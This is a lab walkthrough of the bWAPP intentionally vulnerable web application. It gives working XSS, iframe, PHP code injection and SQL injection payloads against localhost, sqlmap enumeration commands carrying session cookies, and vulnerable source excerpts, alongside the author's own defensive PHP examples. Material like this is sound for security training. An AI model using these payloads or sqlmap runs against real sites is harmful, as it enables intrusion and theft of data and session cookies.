bWAPP

HTML Injection - Reflected (GET)

low

First, enter arbitrary values and look at what is reflected.

Next, enter First name: <p>111</p> and Last name: 1.
The reflected output shows that the tag is rendered, so the input is parsed as HTML.

Now try JavaScript: First name: <script>alert(document.cookie)</script>; Last name: 1.

A dialog pops up showing the cookie.

medium

Enter First name: <script>alert(document.cookie)</script>; Last name: 1.
This time it is not rendered; the page source shows that the angle brackets have been replaced.
Try URL-encoding the angle brackets instead, %3cscript%3ealert(document.cookie)%3c/script%3e, and the dialog appears.

high

Enter <script>alert(document.cookie)</script>; it is not rendered.
Intercepting the request shows that both the angle brackets and the parentheses are encoded.
Looking at the source:

function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

All of the predefined characters are converted to HTML entities, so this level is safe.
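As an added illustration (my own code, not bWAPP's): the medium-level behaviour above, where the replaced brackets come back as soon as the payload is URL-encoded, is what a filter produces when it decodes after it escapes. filter_then_decode() below is a hypothetical reconstruction of that ordering mistake, not bWAPP's own check function; render_greeting() shows the high-level approach of encoding once at output with htmlspecialchars(). Both function names and the sample inputs are mine.

```php
<?php
// Added example, not bWAPP's code. filter_then_decode() is a hypothetical
// reconstruction of the ordering mistake that matches the medium-level
// behaviour (brackets replaced, yet a URL-encoded payload is rendered);
// render_greeting() is the high-level approach. Both names are mine.

function filter_then_decode(string $data): string
{
    // replace the brackets ...
    $data = str_replace(['<', '>'], ['&lt;', '&gt;'], $data);
    // ... then decode: anything sent as %3c / %3e is turned back into a bracket
    // after the filter has already run
    return urldecode($data);
}

function render_greeting(string $first, string $last): string
{
    // Encode once, at the point of output, after every decoding step is done.
    // ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE stops invalid
    // UTF-8 from blanking the whole string.
    $safe_first = htmlspecialchars($first, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $safe_last  = htmlspecialchars($last, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Welcome {$safe_first} {$safe_last}";
}

// Constructed inputs, as PHP receives them after its own single decoding of the
// query string (a % typed into the form is sent as %25, so "%3c" arrives intact).
$inputs = [
    '<p>111</p>',
    '%3cscript%3ealert(document.cookie)%3c/script%3e',
];

foreach ($inputs as $in) {
    echo "input:              ", $in, "\n";
    echo "filter_then_decode: ", filter_then_decode($in), "\n";   // second input comes back as a live tag
    echo "render_greeting:    ", render_greeting($in, '1'), "\n"; // inert text in both cases
    echo "\n";
}
```

The rule this demonstrates: canonicalise (decode) first, validate or encode last, and do the encoding at the sink for the context the value lands in.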

HTML Injection - Reflected (POST)

Same as the previous level, except that the parameters are sent with POST instead of GET.

HTML Injection - Reflected (URL)

low

Try building the payload in the URL.
Entering it directly in the browser's address bar, the angle brackets < > get encoded.
Modifying the URL in an intercepting proxy instead succeeds.

medium & high

Looking at the source:

switch($_COOKIE["security_level"])
{

    case "0" :

        // $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
        $url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];               
        break;

    case "1" :

        $url = "<script>document.write(document.URL)</script>";
        break;

    case "2" :

        $url = "http://" . $_SERVER["HTTP_HOST"] . xss_check_3($_SERVER["REQUEST_URI"]);
        break;

    default :

        // $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
        $url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];               
        break;

}

Safe; cannot be bypassed.

HTML Injection - Stored (Blog)

low

Enter arbitrary text and look at the reflection.
Enter <h1>111</h1>; the tag is rendered.
Enter <script>alert(document.cookie)</script>; the dialog pops up with the cookie.

medium & high

Looking at the source:

// security-level dispatch for the blog entry; every branch applies only the
// SQL escaping, the HTML checks are commented out
switch($_COOKIE["security_level"])
{

    case "0" :

        $data = sqli_check_3($link, $data);
        break;

    case "1" :

        $data = sqli_check_3($link, $data);
        // $data = xss_check_4($data);
        break;

    case "2" :

        $data = sqli_check_3($link, $data);
        // $data = xss_check_3($data);
        break;

    default :

        $data = sqli_check_3($link, $data);
        break;

}

function sqli_check_3($link, $data)
{

    // escapes the characters MySQL treats specially inside a quoted string literal
    return mysqli_real_escape_string($link, $data);

}

mysqli_real_escape_string() escapes the special characters in a string for use in an SQL statement. Note that in every branch above only the SQL escaping runs; the xss_check_4()/xss_check_3() calls are commented out, so nothing encodes the stored entry for HTML output.

iFrame Injection

IFRAME is an HTML tag for a document inside a document, or a floating frame (FRAME). The iframe element creates an inline frame that contains another document.

Looking at the source:

function xss($data)
{

    switch($_COOKIE["security_level"])
    {

        case "0" :

            $data = no_check($data);
            break;

        case "1" :

            $data = xss_check_4($data);
            break;

        case "2" :

            $data = xss_check_3($data);
            break;

        default :

            $data = no_check($data);
            break;

    }

    // hand the (possibly filtered) value back to the caller
    return $data;

}
function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

function xss_check_4($data)
{
  
    // addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    // Do NOT use this for XSS or HTML validations!!!
    
    return addslashes($data);
    
}

low

Change ParamUrl directly: http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=https://www.baidu.com&ParamWidth=250&ParamHeight=250

medium

Looking at the source:

function xss_check_4($data)
{

    // addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    // Do NOT use this for XSS or HTML validations!!!

    return addslashes($data);

}

In PHP, addslashes() prepends a backslash to certain predefined characters in the input string.

if($_COOKIE["security_level"] == "1" || $_COOKIE["security_level"] == "2")
{
?>
    <iframe frameborder="0" src="robots.txt" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}

else
{
?>
    <iframe frameborder="0" src="<?php echo xss($_GET["ParamUrl"])?>" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}
?>

Changing the value of ParamUrl has no effect at this level, so look at the other parameters. From the code above, the width value is placed inside a quoted attribute; closing the attribute and the iframe tag after the width value leaves room to insert a script tag:

http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250"></iframe><script>alert(/xss/)</script>&ParamHeight=250

high

Looking at the source:

function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

htmlspecialchars() converts the predefined characters (&, ', ", <, >) to HTML entities; this cannot be bypassed and the level is safe.
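Added example (my own code, not bWAPP's) for the medium and high iframe levels: the same ParamWidth value is run through addslashes() and through htmlspecialchars(), and in front of that sits the input validation I would want before any value reaches an iframe attribute. iframe_tag(), attr_encode(), attr_addslashes() and the allow-list rules are my own assumptions, not part of bWAPP.

```php
<?php
// Added example, not bWAPP's code. Shows the medium-level addslashes() and the
// high-level htmlspecialchars() applied to the same attribute value, plus the
// validation I would put in front of the iframe. iframe_tag(), attr_encode()
// and the allow-list rules are my own assumptions.

function attr_addslashes(string $v): string
{
    // medium level: a backslash before the quote, which HTML does not treat as an escape
    return addslashes($v);
}

function attr_encode(string $v): string
{
    // high level: the quote becomes &quot; and can no longer close the attribute
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate first, encode second. Width and height must be 1-4 digit integers;
// src must be a plain relative path (no scheme, no host, no traversal).
function iframe_tag(string $src, string $width, string $height): ?string
{
    $dimension = '/^[1-9][0-9]{0,3}$/';
    if (!preg_match($dimension, $width) || !preg_match($dimension, $height)) {
        return null;   // reject rather than try to clean up
    }
    if (!preg_match('#^[A-Za-z0-9_./-]+$#', $src) || strpos($src, '..') !== false) {
        return null;
    }
    return sprintf('<iframe frameborder="0" src="%s" height="%s" width="%s"></iframe>',
        attr_encode($src), attr_encode($height), attr_encode($width));
}

// The ParamWidth value from the medium-level walkthrough above.
$width = '250"></iframe><script>alert(/xss/)</script>';

// With addslashes() the quote still ends the attribute; with htmlspecialchars()
// the whole value stays inside it as inert text.
echo 'width="', attr_addslashes($width), "\"\n";
echo 'width="', attr_encode($width), "\"\n";

// Validation rejects that value outright and accepts the intended one.
var_dump(iframe_tag('robots.txt', $width, '250'));
var_dump(iframe_tag('robots.txt', '250', '250'));
var_dump(iframe_tag('https://www.baidu.com', '250', '250'));   // external URL: rejected by the path rule
```

The backslash that addslashes() inserts is meaningful to MySQL and to PHP string literals, not to an HTML parser, which is why the medium-level filter fails in attribute context while entity encoding holds.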

PHP Code Injection

low

bWAPP

Clicking "message" shows "test".
The URL changes from http://127.0.0.1/bWAPP/bWAPP/phpi.php to http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=test. Changing the message value to http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=phpinfo() prints the PHP version information.

<div id="main">

    <h1>PHP Code Injection</h1>

    <p>This is just a test page, reflecting back your <a href="<?php echo($_SERVER["SCRIPT_NAME"]);?>?message=test">message</a>...</p>
    
<?php

if(isset($_REQUEST["message"]))
{

    // If the security level is not MEDIUM or HIGH
    if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>
    <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
    <?php // low level: the message is passed straight to eval() ?>

<?php

    }

    // If the security level is MEDIUM or HIGH
    else
    {
?>
    <p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");?></i></p>

<?php

    }

}

?>
</div>

Looking at the source: at the low level the message is evaluated and output directly; at medium and high it is passed through htmlspecialchars().

SQL Injection (GET/Search)

low

' or 1=1 --
' order by 7 --
' union select 1,2,3,4,5,6,7 --   (columns 2, 3, 4 and 5 are displayed)

' union select 1,user(),database(),4,5,6,7 --

SQL Injection (GET/Select)

low

movie=1 and 1=1 &action=go   normal response
movie=1 and 1=2 &action=go   error
movie=1 order by 7 &action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go   columns 2, 3, 4 and 5 are displayed

movie=0 union select 1,user(),database(),4,5,6,7 &action=go

medium & high

Looking at the source:

function sqli($data)
{

    switch($_COOKIE["security_level"])
    {

        case "0" :

            $data = no_check($data);
            break;

        case "1" :

            $data = sqli_check_2($data);
            break;

        default :

            $data = no_check($data);
            break;

    }

    // hand the (possibly escaped) value back to the caller
    return $data;

}
function sqli_check_1($data)
{
   
    return addslashes($data);
    
}

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    
}

This is an integer-type injection, so the defences designed for string injection have no effect:
same as low.

SQL Injection (POST/Search)

low

Same as SQL Injection (GET/Search).

medium & high

// security-level dispatch for the search term
switch($_COOKIE["security_level"])
{

    case "0" :

        $data = no_check($data);
        break;

    case "1" :

        $data = sqli_check_1($data);
        break;

    case "2" :

        $data = sqli_check_2($data);
        break;

    default :

        $data = no_check($data);
        break;

}
function sqli_check_1($data)
{
   
    return addslashes($data);
    
}

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    
}

medium uses addslashes() and high uses mysql_real_escape_string() as the defence.
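Added example (my own code, not bWAPP's) covering both the GET/Select medium/high levels above (integer context) and the POST/Search medium/high levels here (string context). It uses an in-memory SQLite database through PDO, so it assumes the pdo_sqlite extension; the tables and rows are constructed for the demonstration, and sqlite_escape() stands in for mysql_real_escape_string(), which needs a live MySQL connection. It shows why quote-escaping holds in the quoted string context of the search but does nothing in the unquoted integer context of the select, and how a prepared statement with type validation covers both.

```php
<?php
// Added example, not bWAPP's code. In-memory SQLite through PDO; the movies and
// secrets tables and their rows are constructed for this demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year INTEGER)');
$db->exec("INSERT INTO movies VALUES (1, 'Iron Man', 2008), (2, 'Gladiator', 2000)");
$db->exec('CREATE TABLE secrets (note TEXT)');
$db->exec("INSERT INTO secrets VALUES ('not a movie title')");

// SQLite analogue of mysql_real_escape_string(): neutralise the quote character.
function sqlite_escape(string $s): string
{
    return str_replace("'", "''", $s);
}

// Escaping-based defence as at the medium/high levels: the value is still
// glued into the SQL text; only the quote is neutralised.
function search_escaped(PDO $db, string $title): array
{
    $sql = "SELECT title FROM movies WHERE title LIKE '%" . sqlite_escape($title) . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

function select_escaped(PDO $db, string $id): array
{
    // Integer context: the developer writes no quotes, so there is nothing to escape.
    $sql = "SELECT title FROM movies WHERE id = " . sqlite_escape($id);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Prepared statements: the SQL text is fixed before any value arrives.
function search_prepared(PDO $db, string $title): array
{
    $stmt = $db->prepare('SELECT title FROM movies WHERE title LIKE :pattern');
    $stmt->execute([':pattern' => '%' . $title . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function select_prepared(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {          // validate the type before SQL ever sees it
        return [];
    }
    $stmt = $db->prepare('SELECT title FROM movies WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$string_probe  = "' OR 1=1 -- ";                       // the page's search probe
$integer_probe = '0 union select note from secrets';   // the page's select probe, cut to one column

// Plain values behave the same way in both styles.
print_r(search_escaped($db, 'Iron'));
print_r(search_prepared($db, 'Iron'));
print_r(select_prepared($db, '2'));

// String context: escaping holds, the probe is just a pattern that matches nothing.
print_r(search_escaped($db, $string_probe));

// Integer context: escaping changes nothing and the secrets row is returned.
print_r(select_escaped($db, $integer_probe));

// Prepared and validated: the probe is rejected before it reaches SQL.
print_r(select_prepared($db, $integer_probe));
print_r(search_prepared($db, $string_probe));
```

The point to take from the two escaped functions: an escaping routine only protects the context its author had in mind (a quoted string literal), so a value that is concatenated unquoted gets no protection at all. Binding parameters removes that dependency on the developer remembering the context.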

SQL Injection (POST/Select)

low

movie=1 and 1=1 &action=go
movie=1 order by 7&action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go
movie=0 union select 1,user(),database(),4,5,6,7 &action=go

SQL Injection (AJAX/JSON/jQuery)

Introduction

AJAX is a technique for building fast, dynamic web pages. By exchanging small amounts of data with the server in the background, AJAX lets a page update asynchronously, so parts of the page can be updated without reloading the whole page.
AJAX = Asynchronous JavaScript and XML

low

 <script>

        $("#title").keyup(function(){
            // Searches for a movie title
            var search = {title: $("#title").val()};

            // AJAX call
            $.getJSON("sqli_10-2.php", search, function(data){
                init_table();
                // Constructs the table from the JSON data; the JSON fields are
                // concatenated straight into HTML markup
                var total = 0;
                $.each(data, function(key, val){
                    total++;
                    $("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
                });
                // Empty result
                if (total == 0)
                {
                    $("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
                }
            });

        });

 </script>

SQL Injection - Stored (Blog)

Stored XSS

low

  • First enter <h>11111</h>; it is reflected.

  • Try a JavaScript payload, <script>alert(/xss/)</script>.
    The dialog pops up.

  • Looking at the source, there are the following three parameters.

  • Code review:

    if(isset($_POST["blog"]))   // blog was submitted via POST with a value
    {

        $entry = sqli($_POST["entry"]);   // the submitted value is assigned to $entry
        $owner = $_SESSION["login"];

        if($entry == "")
        {

            $message =  "<font color=\"red\">Please enter some text...</font>";

        }

        else
        {
            // the three values of the new blog row, in column order
            $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";

            $recordset = $link->query($sql);

            if(!$recordset)
            {

                die("Error: " . $link->error . "<br /><br />");

            }

            // Debugging
            // echo $sql;

            $message = "<font color=\"green\">The entry was added to our blog!</font>";

        }

    }

    Intercept the request in Burp Suite and send it to Repeater.
    Set the entry parameter to 1'; the SQL error shows that this point is injectable.
    Note this line: $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
    Try entry=1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#&blog=add
    Here 1' closes the quoted string that follows now(); (select group_concat(table_name) from information_schema.tables where table_schema='bWAPP') is a single unit that becomes the inserted value; the ) after it closes the opening parenthesis of VALUES, at which point
    the page shows the result, confirming the injection; the # then comments out the rest of the statement.

medium & high

  • Looking at the source, an addslashes()-style escaping function is applied, so quote characters can no longer be used:
    function sqli_check_2($data)
    {
        return mysql_real_escape_string($data);
    }
    function sqli_check_3($link, $data)
    {
        return mysqli_real_escape_string($link, $data);
    }

  • Entering <script>alert(/xss/)</script> is still reflected successfully.
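Added example (my own code, not bWAPP's) for the medium/high levels here and for the earlier HTML Injection - Stored (Blog) section, where the xss_check calls are commented out: a blog table in an in-memory SQLite database through PDO (assumes the pdo_sqlite extension; table and sample entry constructed here). The entry is stored with a parameterised INSERT and encoded only when rendered. addslashes() is used as a connection-free stand-in for mysqli_real_escape_string() to show that SQL escaping leaves HTML tags untouched, which is why the script still runs at these levels.

```php
<?php
// Added example, not bWAPP's code. In-memory SQLite through PDO; the blog table
// and the sample entry are constructed here.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE blog (id INTEGER PRIMARY KEY AUTOINCREMENT, date TEXT, entry TEXT, owner TEXT)');

function add_entry(PDO $db, string $entry, string $owner): void
{
    // Parameterised INSERT: a quote inside the entry cannot end the string literal,
    // and the text is stored exactly as typed (no escaping baked into the data).
    $stmt = $db->prepare("INSERT INTO blog (date, entry, owner) VALUES (date('now'), :entry, :owner)");
    $stmt->execute([':entry' => $entry, ':owner' => $owner]);
}

function html_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_entries(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT date, entry, owner FROM blog ORDER BY id') as $row) {
        // Encoding happens at the HTML output sink, the step that bWAPP's
        // commented-out xss_check calls would have been responsible for.
        $html .= '<tr><td>' . html_text($row['date']) . '</td><td>'
               . html_text($row['entry']) . '</td><td>'
               . html_text($row['owner']) . "</td></tr>\n";
    }
    return $html;
}

// Constructed entry carrying both an SQL metacharacter and HTML markup.
$entry = "O'Brien says <script>alert(/xss/)</script>";

// SQL escaping alone (addslashes() as a stand-in for mysqli_real_escape_string(),
// which needs a live MySQL link) handles the quote and leaves the tag intact.
echo "sql-escaped only: ", addslashes($entry), "\n";

add_entry($db, $entry, 'bee');
// Stored verbatim, apostrophe and all, because the value never touched the SQL text.
echo "stored:           ", $db->query('SELECT entry FROM blog')->fetchColumn(), "\n";
// Rendered with the apostrophe and the angle brackets as entities.
echo "rendered:\n", render_entries($db);
```

Escaping for the database and encoding for the browser are two different jobs done at two different sinks; doing only the first one is exactly the state of the medium and high levels on this page.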

SQL Injection - Stored (SQLite)

See here for SQLite syntax.

low

Enter the JavaScript payload <script>alert(/xss/)</script>; the dialog pops up.
Looking at the source:

if(isset($_POST["entry_add"]))
{

    $entry = sqli($_POST["entry"]);
    $owner = $_SESSION["login"];

    if($entry == "")
    {

        $message =  "<font color=\"red\">Please enter some text...</font>";

    }

    else
    {

        $db = new PDO("sqlite:".$db_sqlite);

        $sql = "SELECT max(id) as id FROM blog;";

        $recordset = $db->query($sql);

        $row = $recordset->fetch();

        $id = $row["id"];

        // the entry is concatenated straight into the INSERT statement
        $sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-m-d', time()) . "','" . $entry . "','" . $owner . "');";

        $db->exec($sql);

        $message = "<font color=\"green\">The entry was added to our blog!</font>";

    }

}

SQL Injection - Stored (User-Agent)

low

Click "download" to view the log.
Looking at the source:

$ip_address = $_SERVER["REMOTE_ADDR"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];

// Writes the entry into the database
$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";

$recordset = $link->query($sql);

if(!$recordset)
{

    die("Error: " . $link->error);

}

// Writes the entry into a text file
$line = "'" . date("y/m/d G.i:s", time()) . "', '" . $ip_address . "', '" . xss($user_agent) . "'" . "\r\n";     

$fp = fopen("logs/visitors.txt", "a");
fputs($fp, $line, 200);
fclose($fp);

// Selects all the records
$sql = "SELECT * FROM visitors ORDER by id DESC LIMIT 3";

$recordset = $link->query($sql);

if(!$recordset)
{

    die("Error: " . $link->error);

}

Intercept the request and modify the User-Agent header.
Sending 1' produces an error.

User-Agent: 1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#
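Added example (my own code, not bWAPP's): how I would write the visitors.txt line from the source above so that a crafted User-Agent cannot add or alter log records. The same header goes into the INSERT as well, and that part belongs in a prepared statement; this block only covers the text log. Function names and the sample header values are constructed.

```php
<?php
// Added example, not bWAPP's code. A hardened version of the visitor log line
// built in the source above; function names and sample header values are mine.

// One record per line: strip CR, LF and other control characters, cap the
// length (the page's fputs() call caps the whole line at 200 bytes), and quote
// the field so a crafted value cannot pose as a delimiter or a second record.
function log_field(string $value, int $max = 120): string
{
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    $clean = substr($clean, 0, $max);
    return "'" . str_replace("'", "\\'", $clean) . "'";
}

function visitor_line(string $ip, string $user_agent, int $timestamp): string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        // REMOTE_ADDR comes from the socket, so this should not happen;
        // log a fixed marker rather than the raw value if it ever does
        $ip = 'invalid';
    }
    return date('y/m/d G.i:s', $timestamp) . ', ' . log_field($ip) . ', ' . log_field($user_agent) . "\r\n";
}

// Constructed header values: an ordinary browser string, then one containing a
// CRLF which, written raw as the page's code does, would start a new line in
// visitors.txt and pass for a separate visitor.
$samples = [
    'Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0',
    "scanner/1.0\r\n'24/01/01 0.00:00', '10.0.0.1', 'looks like another visitor'",
];

foreach ($samples as $ua) {
    echo visitor_line('127.0.0.1', $ua, time());
}
```

Keeping the log line-oriented and quoting the fields matters for anyone who later parses visitors.txt during an investigation: a header that can inject line breaks can forge or hide entries in the one artefact the defender relies on.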

SQL Injection - Blind - Boolean-Based

low

Boolean-based blind injection
' or 1=1 #
Using sqlmap (see here for how the tool is used):

  • First obtain the cookie with Burp Suite.

  • Enumerate the databases
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs

  • Get the name of the current database
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --current-db

  • List all tables in the database
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp --tables

  • List all columns of the movies table in the bwapp database
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies --columns

  • Dump all values of the id column of the movies table
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies -C genre --dump
    (The scan takes too long; skipped.)

medium

Uses addslashes():

addslashes() returns a string with backslashes added before predefined characters.

The predefined characters are:

    single quote (')
    double quote (")
    backslash (\)
    NUL

Tip: this function can be used to prepare strings for storage in a database and for database query statements.

Note: by default, PHP runs addslashes() automatically on all GET, POST and COOKIE data (magic quotes),
     so addslashes() should not be applied to strings that are already escaped, as that causes double escaping.
     get_magic_quotes_gpc() can be used to detect this situation.

Safe

high

Uses mysql_real_escape_string():

Escapes special characters in a string for use in an SQL statement.
The following characters are affected:
    \x00
    \n
    \r
    \
    '
    "
    \x1a

On success the function returns the escaped string; on failure it returns false.

Safe

SQL Injection - Blind - Time-Based

low

  • Enumerate the databases
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_15.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
    With sqlmap the remaining steps are the same as above.